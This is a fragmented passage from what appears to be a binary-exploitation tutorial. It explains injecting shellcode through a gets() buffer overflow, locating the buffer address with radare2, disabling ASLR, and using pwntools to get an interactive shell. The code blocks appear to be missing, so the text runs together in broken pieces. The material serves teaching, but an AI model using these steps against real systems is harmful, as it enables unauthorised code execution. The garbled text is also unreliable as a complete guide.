win()
function lying around - shellcode is a way to run your own instructions, giving you the ability to run arbitrary commands on the system.vuln()
using radare2
and work out where in memory the buffer starts; this is where we want to point the return pointer to.gets()
and find the exact address.0xffffcfd4
; if we run the binary multiple times, it should remain where it is (if it doesn't, make sure ASLR is disabled!).context.binary
to our binary; this grabs stuff like the arch, OS and bits and enables pwntools to provide us with working shellcode.process()
because once context.binary
is set it is assumed to use that processp.interactive()
, which enables us to communicate to the shell.EOFError
, print out the shellcode and try to find it in memory - the stack address may be wrong